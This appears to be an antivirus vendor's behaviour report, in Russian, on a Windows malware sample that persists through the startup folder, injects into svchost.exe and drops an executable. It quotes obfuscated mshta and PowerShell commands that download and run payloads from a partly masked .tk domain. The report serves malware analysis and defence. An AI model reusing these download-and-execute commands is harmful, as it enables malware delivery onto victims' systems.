Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\chrome.js
Вредоносные функции
Загружает и запускает на исполнение
- http://pr#####oeletrozema.tk/ja/pu.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\mshta.exe' VBScrIPt:cLOSe (GEToBJeCt ("scripT:http://pr#####oeletrozema.tk/ja/TextPU") )
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\svchost.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\puport.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://pr#####oeletrozema.tk/ja/TextPU
- http://pr#####oeletrozema.tk/ja/pu.exe
UDP
- DNS ASK pr#####oeletrozema.tk
Другое
Создает и запускает на исполнение
- '%APPDATA%\puport.exe'
- '<SYSTEM32>\cmd.exe' "/c POweRsHELL.EXE -Ex bYPass -noP -W 1 Set-cONteNT -vA ( nEw-ObjeCT Net.weBCLIEnt ).DownLoadDATa( 'http://pr#####oeletrozema.tk/ja/pu.exe' ) -EN bYtE -path '%...' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' VBScrIPt:cLOSe (GEToBJeCt ("scripT:http://pr#####oeletrozema.tk/ja/TextPU") )' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' "/c POweRsHELL.EXE -Ex bYPass -noP -W 1 Set-cONteNT -vA ( nEw-ObjeCT Net.weBCLIEnt ).DownLoadDATa( 'http://pr#####oeletrozema.tk/ja/pu.exe' ) -EN bYtE -path '%...
- '%WINDIR%\syswow64\svchost.exe'
